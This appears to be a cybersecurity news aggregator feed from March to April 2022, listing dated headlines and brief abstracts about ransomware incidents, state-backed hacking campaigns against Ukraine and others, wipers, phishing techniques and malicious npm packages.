While the details remain sparse, Panasonic suffered another breach just six months after a high-profile attack—this time at Panasonic Canada. The Conti gang said it was behind the February attack that resulted in the theft of more than 2.8GB of data.Security Boulevard
April 14, 2022
Wind turbine firm Nordex hit by Conti ransomware attack Full Text
Abstract
The Conti ransomware operation has claimed responsibility for a cyberattack on wind turbine giant Nordex, which was forced to shut down IT systems and remote access to the managed turbines earlier this month.BleepingComputer
April 14, 2022
Lazarus Targets Chemical Sector Full Text
Abstract
The campaign appears to be a continuation of Lazarus activity dubbed Operation Dream Job, which was first observed in August 2020. In the past, it targeted the defense, government, and engineering sectors.Symantec
April 14, 2022
Hackers target Ukrainian govt with IcedID malware, Zimbra exploits Full Text
Abstract
Hackers are targeting Ukrainian government agencies with new attacks that leverage Zimbra exploits and phishing emails pushing the IcedID malware.BleepingComputer
April 14, 2022
OldGremlin ransomware gang targets Russia with new malware Full Text
Abstract
OldGremlin, a little-known threat actor that uses its particularly advanced skills to run carefully prepared, sporadic campaigns, made a comeback last month after a gap of more than one year.BleepingComputer
April 13, 2022
Industroyer2 Found Targeting Energy Sector in Ukraine Full Text
Abstract
Sandworm APT has been associated with a new Industroyer-2 malware that was used to target electric power systems in Ukraine. Besides, the Sandworm group also uses other malware families such as CaddyWiper, AwfulShred, OrcShred, and SoloShred. Organizations are suggested to follow the recommendation ...Cyware Alerts - Hacker News
April 13, 2022
African banks heavily targeted in RemcosRAT malware campaigns Full Text
Abstract
African banks are increasingly targeted by malware distribution campaigns that employ HTML smuggling tricks and typo-squatted domains to drop remote access trojans (RATs).BleepingComputer
April 13, 2022
Russian Hackers Tried Attacking Ukraine’s Power Grid with Industroyer2 Malware Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) on Tuesday disclosed that it thwarted a cyberattack by Sandworm, a hacking group affiliated with Russia's military intelligence, to sabotage the operations of an unnamed energy provider in the country. "The attackers attempted to take down several infrastructure components of their target, namely: Electrical substations, Windows-operated computing systems, Linux-operated server equipment, [and] active network equipment," The State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said in a statement. Slovak cybersecurity firm ESET, which collaborated with CERT-UA to analyze the attack, said the attempted intrusion involved the use of ICS-capable malware and regular disk wipers, with the adversary unleashing an updated variant of the Industroyer malware, which was first deployed in a 2016 assault on Ukraine's power grid. "The Sandworm attackers made an attempt to d...The Hacker News
April 12, 2022
Attackers Abuse AWS Lambda to Mine Monero Full Text
Abstract
Researchers stumbled across a new malware variant, dubbed Denonia, that targets AWS Lambda, a scalable cloud computing service used by SMBs and enterprise players worldwide. It is a Go-based wrapper designed to deploy a custom XMRig crypto miner for Monero mining. Experts suggest always using ...Cyware Alerts - Hacker News
April 12, 2022
Panasonic’s Canadian Operations Suffered Ransomware Attack Full Text
Abstract
In a statement provided to TechCrunch, Panasonic said that it was a victim of a “targeted cybersecurity attack” in February that affected some of its systems, processes, and networks.Tech Crunch
April 12, 2022
Sandworm hackers fail to take down Ukrainian energy provider Full Text
Abstract
The Russian state-sponsored hacking group known as Sandworm tried on Friday to take down a large Ukrainian energy provider by disconnecting its electrical substations with a new variant of the Industroyer malware for industrial control systems (ICS) and a new version of the CaddyWiper data destruction malware.BleepingComputer
April 12, 2022
BlackCat Ransomware Group Claims Attack on Florida International University Full Text
Abstract
The ransomware group, which most recently attacked North Carolina A&T University, claimed it has stolen a range of personal information from students, teachers, and staff.The Record
April 11, 2022
Operation Bearded Barbie Aims to Catfish Israeli Officials Full Text
Abstract
AridViper APT group was found targeting high-ranking Israeli officials in a cyberespionage campaign to spy and steal data by compromising their systems and mobile devices. The attackers have created various fake Facebook profiles with fabricated identities and stolen or AI-generated images of good- ...Cyware Alerts - Hacker News
April 11, 2022
Parrot TDS: A New Web Redirect Service Full Text
Abstract
Avast laid bare an attack campaign abusing the new Parrot TDS, which has infected over 16,500 websites across different verticals, to deliver RATs via bogus browser update prompts. The campaign started in February, while the signs of Parrot activity have been traced back to October last year. Exper ...Cyware Alerts - Hacker News
April 11, 2022
Luxury fashion house Zegna confirms August ransomware attack Full Text
Abstract
The Italian luxury fashion company Ermenegildo Zegna has disclosed a ransomware incident from August 2021 that has resulted in an extensive IT systems outage.BleepingComputer
April 09, 2022
Hackers use Conti’s leaked ransomware to attack Russian companies Full Text
Abstract
A hacking group used the Conti's leaked ransomware source code to create their own ransomware to use in cyberattacks against Russian organizations.BleepingComputer
April 8, 2022
Anonymous and the IT ARMY of Ukraine continue to target Russian entities Full Text
Abstract
The popular hacking collective Anonymous and the IT ARMY of Ukraine continue to target Russian government entities and private businesses. This week Anonymous claimed to have hacked multiple private businesses and leaked their data through the DDoSecrets platform. The...Security Affairs
April 8, 2022
SaintBear Uses New Set of Payloads to Target Ukrainian Organizations Full Text
Abstract
Researchers found the SaintBear actors targeting Ukrainian organizations using macro-embedded documents in its latest campaign that delivers different Elephant payloads. SaintBear has been actively performing cyberespionage campaigns aimed at Ukraine since 2021. For better protection, organizations ...Cyware Alerts - Hacker News
April 8, 2022
Hamas-linked threat actors target high-profile Israeli individuals Full Text
Abstract
Hamas-linked threat actors conducted an elaborate campaign aimed at high-profile Israeli individuals employed in sensitive sectors. Researchers from Cybereason observed a sophisticated cyberespionage campaign conducted by APT-C-23 group campaigns...Security Affairs
April 07, 2022
Hamas-linked Hackers Targeting High-Ranking Israelis Using ‘Catfish’ Lures Full Text
Abstract
A threat actor with affiliations to the cyber warfare division of Hamas has been linked to an "elaborate campaign" targeting high-profile Israeli individuals employed in sensitive defense, law enforcement, and emergency services organizations. "The campaign operators use sophisticated social engineering techniques, ultimately aimed to deliver previously undocumented backdoors for Windows and Android devices," cybersecurity company Cybereason said in a Wednesday report. "The goal behind the attack was to extract sensitive information from the victims' devices for espionage purposes." The monthslong intrusions, codenamed "Operation Bearded Barbie," have been attributed to an Arabic-speaking and politically-motivated group called Arid Viper, which operates out of the Middle East and is also known by the monikers APT-C-23 and Desert Falcon. Most recently, the threat actor was held responsible for attacks aimed at Palestinian activists...The Hacker News
April 07, 2022
Bearded Barbie hackers catfish high ranking Israeli officials Full Text
Abstract
The Hamas-backed hacking group tracked as 'APT-C-23' was found catfishing Israeli officials working in defense, law enforcement, and government agencies, ultimately leading to the deployment of new malware.BleepingComputer
April 6, 2022
Ukraine warns of attacks aimed at taking over Telegram accounts Full Text
Abstract
Ukraine's technical security and intelligence service warns of threat actors aiming to gain access to users' Telegram accounts. The State Service of Special Communication and Information Protection (SSSCIP) of Ukraine spotted a new wave of cyber...Security Affairs
April 5, 2022
Anonymous targets the Russian Military and State Television and Radio propaganda Full Text
Abstract
Anonymous continues to support Ukraine against the Russian criminal invasion targeting the Russian military and propaganda. Anonymous leaked personal details of the Russian military stationed in Bucha where the Russian military carried out a massacre...Security Affairs
April 05, 2022
Researchers Trace Widespread Espionage Attacks Back to Chinese ‘Cicada’ Hackers Full Text
Abstract
A Chinese state-backed advanced persistent threat (APT) group known for singling out Japanese entities has been attributed to a new long-running espionage campaign targeting new geographies, suggesting a "widening" of the threat actor's targeting. The widespread intrusions, which are believed to have commenced at the earliest in mid-2021 and continued as recently as February 2022, have been tied to a group tracked as Cicada, which is also known as APT10, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team. "Victims in this Cicada (aka APT10) campaign include government, legal, religious, and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia, and North America," researchers from the Symantec Threat Hunter Team, part of Broadcom Software, said in a report shared with The Hacker News. "There is a strong focus on victims in the government and NGO sectors, with some of these organizations worki...The Hacker News
April 05, 2022
Microsoft detects Spring4Shell attacks across its cloud services Full Text
Abstract
Microsoft said that it's currently tracking a "low volume of exploit attempts" targeting the critical Spring4Shell (aka SpringShell) remote code execution (RCE) vulnerability across its cloud services.BleepingComputer
April 4, 2022
Brokenwire attack, how hackers can disrupt charging for electric vehicles Full Text
Abstract
Boffins devised a new attack technique, dubbed Brokenwire, against the Combined Charging System (CCS) that could potentially disrupt charging for electric vehicles. A group of researchers from the University of Oxford and Armasuisse S+T has devised...Security Affairs
April 4, 2022
Emma Sleep Company admits attack on online checkout Full Text
Abstract
Emma Sleep Company has confirmed to The Reg that it suffered a Magecart attack which enabled the cybercriminals to skim customers' credit or debit card data from its website.The Register
April 01, 2022
Russian Wiper Malware Likely Behind Recent Cyberattack on Viasat KA-SAT Modems Full Text
Abstract
The cyberattack aimed at Viasat that temporarily knocked KA-SAT modems offline on February 24, 2022, the same day Russian military forces invaded Ukraine, is believed to have been the consequence of wiper malware, according to the latest research from SentinelOne. The findings come as the U.S. telecom company disclosed that it was the target of a "multifaceted and deliberate" cyberattack against its KA-SAT network, linking it to a "ground-based network intrusion by an attacker exploiting a misconfiguration in a VPN appliance to gain remote access to the trusted management segment of the KA-SAT network." Upon gaining access, the adversary issued "destructive commands" on tens of thousands of modems belonging to the satellite broadband service that "overwrote key data in flash memory on the modems, rendering the modems unable to access the network, but not permanently unusable." But SentinelOne said it uncovered a new piece of malware (named ...The Hacker News
April 1, 2022
Anonymous targets oligarchs’ Russian businesses: Marathon Group hacked Full Text
Abstract
Anonymous continues its operations against Russia, the group announced the hack of the Russian investment firm Marathon Group. Anonymous continues to target Russian firms owned by oligarchs, yesterday the collective announced the hack of the Thozis...Security Affairs
April 01, 2022
Chinese Hackers Target VMware Horizon Servers with Log4Shell to Deploy Rootkit Full Text
Abstract
A Chinese advanced persistent threat tracked as Deep Panda has been observed exploiting the Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor and a novel rootkit on infected machines with the goal of stealing sensitive data. "The nature of targeting was opportunistic insofar that multiple infections in several countries and various sectors occurred on the same dates," said Rotem Sde-Or and Eliran Voronovitch, researchers with Fortinet's FortiGuard Labs, in a report released this week. "The victims belong to the financial, academic, cosmetics, and travel industries." Deep Panda, also known by the monikers Shell Crew, KungFu Kittens, and Bronze Firestone, is said to have been active since at least 2010, with recent attacks "targeting legal firms for data exfiltration and technology providers for command-and-control infrastructure building," according to Secureworks. Cybersecurity firm CrowdStrike, which assigned the panda...The Hacker News
March 31, 2022
Google TAG details cyber activity with regard to the invasion of Ukraine Full Text
Abstract
Google TAG uncovered phishing attacks targeting Eastern European and NATO countries, including Ukraine. The Google Threat Analysis Group (TAG) provided an update about nation-state attacks related to the ongoing Russian invasion of Ukraine; the experts...Security Affairs
March 31, 2022
Anonymous hacked Russian Thozis Corp, but denies attacks on Rosaviatsia Full Text
Abstract
The Anonymous collective hacked the Russian investment firm Thozis Corp, but the attack against the Russian Civil Aviation Authority Rosaviatsia remains a mystery. Anonymous continues to target Russian organizations and private foreign businesses that are still...Security Affairs
March 31, 2022
Hackers Increasingly Using ‘Browser-in-the-Browser’ Technique in Ukraine Related Attacks Full Text
Abstract
A Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict. The method, which masquerades as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns. "Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites," Google's Threat Analysis Group (TAG) said in a new report, using it to siphon credentials entered by unsuspecting victims to a remote server. Other groups using the war as a lure in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include Mustang Panda and Scarab, as well as nation-state actors from Iran, North Korea, and Russia...The Hacker News
March 31, 2022
Remote ‘Brokenwire’ Hack Prevents Charging of Electric Vehicles at DC Fast Chargers Full Text
Abstract
The attack targets the Combined Charging System (CCS) — a widely used DC rapid charging technology — and it interrupts the communication between the charger and the vehicle.Security Week
March 31, 2022
Anonymous hacked Russian Thozis Corp, but denies attacks on Rosaviatsia Full Text
Abstract
Anonymous continues to target Russian organizations and foreign businesses that are still operating in the country. Now, it claims to have hacked the Russian investment firm Thozis Corp, which is owned by the oligarch Zakhar Smushkin.Security Affairs
March 31, 2022
Calendly actively abused in Microsoft credentials phishing Full Text
Abstract
Phishing actors are actively abusing Calendly to kick off a clever sequence to trick targets into entering their email account credentials on the phishing page.BleepingComputer
March 30, 2022
Researchers Expose Mars Stealer Malware Campaign Using Google Ads to Spread Full Text
Abstract
A nascent information stealer called Mars has been observed in campaigns that take advantage of cracked versions of the malware to steal information stored in web browsers and cryptocurrency wallets. "Mars Stealer is being distributed via social engineering techniques, malspam campaigns, malicious software cracks, and keygens," Morphisec malware researcher Arnold Osipov said in a report published Tuesday. Based on the Oski Stealer and first discovered in June 2021, Mars Stealer is said to be constantly under development and available for sale on over 47 underground forums, darknet sites, and Telegram channels, costing only $160 for a lifetime subscription. Information stealers allow adversaries to vacuum personal information from compromised systems, including stored credentials and browser cookies, which are then sold on criminal marketplaces or used as a springboard for launching further attacks. The release of Mars Stealer last year has also been accompanied by...The Hacker News
March 30, 2022
MSHTML Flaw Exploited to Attack Russian Dissidents Full Text
Abstract
A Ukrainian-based threat actor is spearphishing Russians who are using services that have been banned by the Kremlin.Threatpost
March 30, 2022
Google: Russian phishing attacks target NATO, European military Full Text
Abstract
The Google Threat Analysis Group (TAG) says more and more threat actors are now using Russia's war in Ukraine to target Eastern European and NATO countries, including Ukraine, in phishing and malware attacks.BleepingComputer
March 30, 2022
Viasat shares details on KA-SAT satellite service cyberattack Full Text
Abstract
US satellite communications provider Viasat has shared an incident report regarding the cyberattack that affected its KA-SAT consumer-oriented satellite broadband service on February 24, the day Russia invaded Ukraine.BleepingComputer
March 30, 2022
Phishing campaign targets Russian govt dissidents with Cobalt Strike Full Text
Abstract
A new spear phishing campaign is taking place in Russia targeting dissenters with opposing views to those promoted by the state and national media about the war against Ukraine.BleepingComputer
March 30, 2022
Threat actors actively exploit recently fixed Sophos firewall bug Full Text
Abstract
Cybersecurity firm Sophos warned that the recently addressed CVE-2022-1040 flaw in Sophos Firewall is actively exploited in attacks. Sophos has recently fixed an authentication bypass vulnerability, tracked as CVE-2022-1040, that resides...Security Affairs
March 30, 2022
Lapsus$ and SolarWinds hackers both use the same old trick to bypass MFA Full Text
Abstract
One group using this technique, according to security firm Mandiant, is Cozy Bear, a band of elite hackers working for Russia's Foreign Intelligence Service. The group also goes under the names Nobelium, APT29, and the Dukes.Ars Technica
March 29, 2022
An Ongoing Reply-Chain Hijacking Campaign Drops IcedID Full Text
Abstract
Researchers have detected a new conversation hijacking campaign that exploits unpatched Exchange servers to deliver IcedID trojan within the energy, healthcare, pharmaceutical, and legal sectors. It's been almost a year since the disclosure of ProxyShell vulnerabilities in Exchange servers but not ...Cyware Alerts - Hacker News
March 29, 2022
Ukrainian military internet provider suffers cyberattack Full Text
Abstract
Ukraine's state-owned telecommunications company, Ukrtelecom, which is used by the country's military, experienced a massive cyberattack on Monday.The Hill
March 29, 2022
New Hacking Campaign by Transparent Tribe Hackers Targeting Indian Officials Full Text
Abstract
A threat actor of likely Pakistani origin has been attributed to yet another campaign designed to backdoor targets of interest with a Windows-based remote access trojan named CrimsonRAT since at least June 2021. "Transparent Tribe has been a highly active APT group in the Indian subcontinent," Cisco Talos researchers said in an analysis shared with The Hacker News. "Their primary targets have been government and military personnel in Afghanistan and India. This campaign furthers this targeting and their central goal of establishing long term access for espionage." Last month, the advanced persistent threat expanded its malware toolset to compromise Android devices with a backdoor named CapraRAT that exhibits a high "degree of crossover" with CrimsonRAT. The latest set of attacks detailed by Cisco Talos involves making use of fake domains that mimic legitimate government and related organizations to deliver the malicious payloads, including a Pytho...The Hacker News
March 29, 2022
Multiple E-commerce Stores Found Being Targeted Since 2020 Full Text
Abstract
Active since 2020, the campaign is the work of cybercriminal gangs from China. According to Seguranca Informatica, the campaign has targeted around 617 online stores located in Portugal, France, Spain, Italy, Chile, Mexico, and Colombia, among others.Cyware Alerts - Hacker News
March 29, 2022
Hackers use modified MFA tool against Indian govt employees Full Text
Abstract
A new campaign from the hacking group tracked as APT36, aka 'Transparent Tribe' or 'Mythic Leopard,' has been discovered using new custom malware and entry vectors in attacks against the Indian government.BleepingComputer
March 29, 2022
Ukrtelecom, a major mobile service and internet provider in Ukraine, foiled a “massive” cyberattack that hit its infrastructure Full Text
Abstract
Ukrtelecom, a major mobile service and internet provider in Ukraine, foiled a “massive” cyberattack that hit its infrastructure. On March 29, 2022, a massive cyber attack caused a major internet disruption across Ukraine on national provider Ukrtelecom....Security Affairs
March 29, 2022
A Large-Scale Supply Chain Attack Distributed Over 800 Malicious NPM Packages Full Text
Abstract
A threat actor dubbed "RED-LILI" has been linked to an ongoing large-scale supply chain attack campaign targeting the NPM package repository by publishing nearly 800 malicious modules. "Customarily, attackers use an anonymous disposable NPM account from which they launch their attacks," Israeli security company Checkmarx said. "As it seems this time, the attacker has fully-automated the process of NPM account creation and has opened dedicated accounts, one per package, making his new malicious packages batch harder to spot." The findings build on recent reports from JFrog and Sonatype, both of which detailed hundreds of NPM packages that leverage techniques like dependency confusion and typosquatting to target Azure, Uber, and Airbnb developers. According to a detailed analysis of RED-LILI's modus operandi, earliest evidence of anomalous activity is said to have occurred on February 23, 2022, with the cluster of malicious packages publis...The Hacker News
March 29, 2022
School of Hard Knocks: Job Fraud Threats Target University Students Full Text
Abstract
Employment fraud typically impacts individuals, and the results can be costly. According to the FBI's Internet Crime Complaint Center, the average reported loss from this type of scheme is $3,000.Proofpoint
March 29, 2022
New Report on Okta Hack Reveals the Entire Episode LAPSUS$ Attack Full Text
Abstract
An independent security researcher has shared a detailed timeline of events that transpired as the notorious LAPSUS$ extortion gang broke into a third-party provider linked to the cyber incident at Okta in late January 2022. In a set of screenshots posted on Twitter, Bill Demirkapi published a two-page "intrusion timeline" allegedly prepared by Mandiant, the cybersecurity firm hired by Sitel to investigate the security breach. Sitel, through its acquisition of Sykes Enterprises in September 2021, is the third-party service provider that provides customer support on behalf of Okta. The authentication services provider revealed last week that on January 20, it was alerted to a new factor that was added to a Sitel customer support engineer's Okta account, an attempt that it said was successful and blocked. The incident only came to light two months later after LAPSUS$ posted screenshots on their Telegram channel as evidence of the breach on March 22. The...The Hacker News
March 28, 2022
Oklahoma City Indian Clinic impacted by Suncrypt’s ransomware attack Full Text
Abstract
The explanation for the “technological issues” appears to be a ransomware attack by Suncrypt, who have added the clinic to their dedicated leak site. Suncrypt claims that they have acquired 350GB+ of files.Data Breaches
March 28, 2022
Attackers Use Compromised Philippine Navy Certificate to Spread Remote Access Tool Full Text
Abstract
Avast Threat Intelligence Team has found a remote access tool (RAT) actively being used in the wild in the Philippines that uses what appears to be a compromised digital certificate belonging to the Philippine Navy.Avast
March 28, 2022
‘Purple Fox’ Hackers Spotted Using New Variant of FatalRAT in Recent Malware Attacks Full Text
Abstract
The operators of the Purple Fox malware have retooled their malware arsenal with a new variant of a remote access trojan called FatalRAT, while also simultaneously upgrading their evasion mechanisms to bypass security software. "Users' machines are targeted via trojanized software packages masquerading as legitimate application installers," Trend Micro researchers said in a report published on March 25, 2022. "The installers are actively distributed online to trick users and increase the overall botnet infrastructure." The findings follow prior research from Minerva Labs that shed light on a similar modus operandi of leveraging fraudulent Telegram applications to distribute the backdoor. Other disguised software installers include WhatsApp, Adobe Flash Player, and Google Chrome. These packages act as a first-stage loader, triggering an infection sequence that leads to the deployment of a second-stage payload from a remote server and culminating in theThe Hacker News
March 28, 2022
While Twitter suspends Anonymous accounts, the group hacked VGTRK Russian Television and Radio Full Text
Abstract
While Twitter suspends some Anonymous accounts, the collective hacked All-Russia State Television and Radio Broadcasting Company (VGTRK). On Friday, Anonymous announced that the affiliate group Black Rabbit World has leaked 28 GB of data stolen from...Security Affairs
March 28, 2022
Chrome and Edge hit with V8 type confusion vulnerability with in-the-wild exploit Full Text
Abstract
Google is urging users on Windows, macOS, and Linux to update Chrome builds to version 99.0.4844.84, following the discovery of a vulnerability that has an exploit in the wild.ZDNet
March 28, 2022
Microsoft Exchange targeted for IcedID reply-chain hijacking attacks Full Text
Abstract
The distribution of the IcedID malware has returned to notable numbers thanks to a new campaign that hijacks existing email conversation threads and injects payloads that are hard to spot as malicious.BleepingComputer
March 26, 2022
Russian military behind hack of satellite communication devices in Ukraine at war’s outset, U.S. officials say Full Text
Abstract
U.S. intelligence analysts have concluded that Russian military spy hackers were behind a cyberattack on a satellite broadband service that disrupted Ukraine’s military communications at the start of the war last month.MSN
March 26, 2022
Chinese Threat Actor Scarab Found Targeting Ukraine Full Text
Abstract
The malicious activity by the threat actor dubbed UAC-0026 represents one of the first public examples of a Chinese threat actor targeting Ukraine since the invasion began.Sentinel One
March 24, 2022
Microsoft Azure Developers Awash in PII-Stealing npm Packages Full Text
Abstract
A large-scale, automated typosquatting attack saw 200+ malicious packages flood the npm code repository, targeting popular Azure scopes.Threatpost
March 24, 2022
Anonymous claims to have hacked the Central Bank of Russia Full Text
Abstract
The infamous hacker collective claims to have compromised the systems of the Central Bank of Russia and stolen 35,000 files; it announced that it will leak the files in 48 hours.Security Affairs
March 24, 2022
Researchers Trace LAPSUS$ Cyber Attacks to 16-Year-Old Hacker from England Full Text
Abstract
Authentication services provider Okta on Wednesday named Sitel as the third-party linked to a security incident experienced by the company in late January that allowed the LAPSUS$ extortion gang to remotely take over an internal account belonging to a customer support engineer. The company added that 366 corporate customers, or about 2.5% of its customer base, may have been impacted by the "highly constrained" compromise. "On January 20, 2022, the Okta Security team was alerted that a new factor was added to a Sitel customer support engineer's Okta account [from a new location]," Okta's Chief Security Officer, David Bradbury, said in a statement. "This factor was a password." The disclosure comes after LAPSUS$ posted screenshots of Okta's apps and systems earlier this week, about two months after the hackers gained access to the company's internal network over a five-day period between January 16 and 21, 2022 using remote desktop protoThe Hacker News
March 24, 2022
Anonymous claims to have hacked the Central Bank of Russia Full Text
Abstract
The Anonymous hacker collective claims to have hacked the Central Bank of Russia and accessed and stolen 35,000 documents. Anonymous continues to target Russian government organizations and private businesses; now it is claiming to have hacked the Central...Security Affairs
March 24, 2022
Okta says 375 customers impacted by the hack, but Lapsus$ gang says it is lying Full Text
Abstract
The provider of access management systems Okta confirmed the data breach and revealed that 2.5% of its customers were impacted. This week the Lapsus$ extortion group claimed to have stolen sensitive data from the identity and access management giant...Security Affairs
March 23, 2022
Ukrainian enterprises hit with the DoubleZero wiper Full Text
Abstract
Ukraine CERT-UA warns of a cyberattack aimed at Ukrainian enterprises using a wiper dubbed DoubleZero. Ukraine CERT-UA continues to observe malware-based attacks aimed at Ukrainian organizations; in a recent alert it warned of attacks employing...Security Affairs
March 23, 2022
New Mustang Panda hacking campaign targets diplomats, ISPs Full Text
Abstract
An ongoing Mustang Panda campaign that started at least eight months ago has been uncovered by threat analysts, who also managed to sample and analyze custom malware loaders and a new Korplug variant.BleepingComputer
March 23, 2022
Browser-in-the-Browser - An (Almost) Invisible Attack Full Text
Abstract
Researchers devised a new phishing technique, dubbed Browser-in-the-Browser (BitB) attack, that lets cybercriminals spoof a browser window within a browser by leveraging a mix of HTML and CSS code. The novel BitB attack bypasses both a URL with HTTPS encryption and a hover-over-it security check. ...Cyware Alerts - Hacker News
March 22, 2022
Microsoft confirms they were hacked by Lapsus$ extortion group Full Text
Abstract
Microsoft has confirmed that one of their employees was compromised by the Lapsus$ hacking group, allowing the threat actors to access and steal portions of their source code.BleepingComputer
March 22, 2022
A new wave of DeadBolt Ransomware attacks hit QNAP NAS devices  Full Text
Abstract
Internet search engine Censys reported a new wave of DeadBolt ransomware attacks targeting QNAP NAS devices. Internet search engine Censys reported that QNAP devices were targeted in a new wave of DeadBolt ransomware attacks. Since January, DeadBolt...Security Affairs
March 22, 2022
Scottish mental health charity “devastated” by heartless RansomEXX ransomware attack Full Text
Abstract
SAMH (the Scottish Association for Mental Health) helps provide care and support for adults and young people suffering from issues with their mental health, and campaigns to influence positive social change.Bit Defender
March 22, 2022
Serpent backdoor targets French entities with high-evasive attack chain Full Text
Abstract
A new email campaign aimed at French entities leverages the Chocolatey Windows package manager to deliver the Serpent backdoor. Proofpoint researchers uncovered a targeted attack leveraging an open-source package installer Chocolatey to deliver a backdoor...Security Affairs
March 22, 2022
Top Russian meat producer hit with Windows BitLocker encryption attack Full Text
Abstract
Moscow-based meat producer and distributor Miratorg Agribusiness Holding has suffered a major cyberattack that encrypted its IT systems, according to a report from Rosselkhoznadzor - the Russian federal veterinary and phytosanitary supervision service.BleepingComputer
March 21, 2022
Attackers Targeting Unpatched SolarWinds WHD Instances Full Text
Abstract
In the wake of new attacks, SolarWinds urged customers to remove their Web Help Desk instances from their publicly accessible infrastructure. An attacker may take advantage of unpatched WHD instances (CVE-2021-35251) for getting access to environmental details about the installation. SolarWinds rec ...Cyware Alerts - Hacker News
March 21, 2022
Serpent malware campaign abuses Chocolatey Windows package manager Full Text
Abstract
Threat actors are abusing the popular Chocolatey Windows package manager in a new phishing campaign to install new 'Serpent' backdoor malware on systems of French government agencies and large construction firms.BleepingComputer
March 21, 2022
GoDaddy Managed Hosting Service Targeted via Backdoor Infection Full Text
Abstract
The Wordfence Incident Response team alerted nearly 300 websites hosted on GoDaddy's Managed WordPress service that were infected with a common backdoor. The backdoor payload is a 2015 Google search SEO-poisoning tool. Website admins are suggested to remove the backdoor and spam search engine resul ...Cyware Alerts - Hacker News
March 19, 2022
Got Milk? After Supplier Hit by Cyberattack, a NH School District Is Short Full Text
Abstract
The school district said they were informed of the cyberattack on the dairy company. In a statement, the superintendent said the school anticipates milk shortages in the coming weeks.NBC Boston
March 19, 2022
Hackers hit mass background-check firm used by state agencies, universities Full Text
Abstract
Computer hackers made off with highly sensitive personal records on more than 164,000 job-seekers and license applicants in a virtual “smash and grab” attack last November on Creative Services Inc., a company that conducts background checks.Data Breaches
March 18, 2022
Hackers Target Bank Networks with new Rootkit to Steal Money from ATM Machines Full Text
Abstract
A financially motivated threat actor has been observed deploying a previously unknown rootkit targeting Oracle Solaris systems with the goal of compromising Automatic Teller Machine (ATM) switching networks and carrying out unauthorized cash withdrawals at different banks using fraudulent cards. Threat intelligence and incident response firm Mandiant is tracking the cluster under the moniker UNC2891, with some of the group's tactics, techniques, and procedures sharing overlaps with that of another cluster dubbed UNC1945 . The intrusions staged by the actor involve "a high degree of OPSEC and leverage both public and private malware, utilities, and scripts to remove evidence and hinder response efforts," Mandiant researchers said in a new report published this week. Even more concerningly, the attacks spanned several years in some cases, during the entirety of which the actor remained undetected by leveraging a rootkit called CAKETAP, which is designed to conceal nThe Hacker News
March 18, 2022
China-linked threat actors are targeting the government of Ukraine Full Text
Abstract
Google's TAG team revealed that China-linked APT groups are targeting Ukraine's government for intelligence purposes. Google's Threat Analysis Group (TAG) researchers uncovered cyberespionage operations conducted by the Chinese People's Liberation...Security Affairs
March 18, 2022
DarkHotel hacking campaign targets luxury Macao resorts Full Text
Abstract
The South Korean DarkHotel hacking group has been spotted in a new campaign spanning December 2021 through January 2022, targeting luxury hotels in Macao, China.BleepingComputer
March 18, 2022
Google: Chinese state hackers target Ukraine’s government Full Text
Abstract
Google's Threat Analysis Group (TAG) says the Chinese People's Liberation Army (PLA) and other Chinese intelligence agencies are trying to get more info on the ongoing Russian war in Ukraine.BleepingComputer
March 18, 2022
Japan’s Bridgestone confirms ransomware attack at US subsidiary Full Text
Abstract
Japanese tyre manufacturer Bridgestone has confirmed that its US subsidiary had suffered a ransomware attack, just weeks after suppliers of automaker Toyota Motor reported similar attacks.Channel News Asia
March 17, 2022
SolarWinds Warns of Attacks Targeting Web Help Desk Users Full Text
Abstract
SolarWinds warns customers of potential cyberattacks targeting unpatched installs of its Web Help Desk (WHD) product. SolarWinds has published a security advisory to warn customers of the risk of cyberattacks targeting unpatched Web Help Desk (WHD)...Security Affairs
March 17, 2022
New Wipers and Fake AV Updates Target Ukraine Full Text
Abstract
Researchers spotted the third wiper malware in use against Ukrainian organizations, which destroys user data and partition information from attached drives, while also reporting a new phishing attack. The Ukrainian agency has linked the recent activity with the UAC-0056 group with medium confidence. ...Cyware Alerts - Hacker News
March 16, 2022
Unsecured Microsoft SQL, MySQL servers hit by Gh0stCringe malware Full Text
Abstract
Hackers target poorly secured Microsoft SQL and MySQL database servers to deploy the Gh0stCringe remote access trojan on vulnerable devices.BleepingComputer
March 16, 2022
Russia-linked threat actors exploited default MFA protocol and PrintNightmare bug to compromise NGO cloud Full Text
Abstract
FBI and CISA warn Russia-linked threat actors gained access to an NGO cloud after enrolling their own device in the organization's Duo MFA. The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) ...Security Affairs
March 16, 2022
SolarWinds warns of attacks targeting Web Help Desk instances Full Text
Abstract
SolarWinds warned customers of attacks targeting Internet-exposed Web Help Desk (WHD) instances and advised removing them from publicly accessible infrastructure (likely to prevent the exploitation of a potential security flaw).BleepingComputer
March 16, 2022
Emotet malware campaign impersonates the IRS for 2022 tax season Full Text
Abstract
The Emotet malware botnet is taking advantage of the 2022 U.S. tax season by sending out malicious emails pretending to be the Internal Revenue Service sending tax forms or federal returns.BleepingComputer
March 15, 2022
Pandora Ransomware Hits Giant Automotive Supplier Denso Full Text
Abstract
Denso confirmed that cybercriminals leaked stolen, classified information from the Japan-based car-components manufacturer after an attack on one of its offices in Germany.Threatpost
March 15, 2022
MuddyWater Uses SloughRAT To Target Turkey and Arabian Peninsula Full Text
Abstract
Iranian MuddyWater APT launched a new series of attacks targeting Turkey and the Arabian Peninsula. The recent intrusions appear to be a continuation of a November 2021 campaign targeting Turkish entities. Its malicious activities show the group's piqued interest in the region and its geopolitics.Cyware Alerts - Hacker News
March 15, 2022
CaddyWiper, a new data wiper hits Ukraine Full Text
Abstract
Experts discovered a new wiper, tracked as CaddyWiper, that was employed in attacks targeting Ukrainian organizations. Experts at ESET Research Labs discovered a new data wiper, dubbed CaddyWiper, that was employed in attacks targeting Ukrainian organizations. The...Security Affairs
March 14, 2022
Fake antivirus updates used to deploy Cobalt Strike in Ukraine Full Text
Abstract
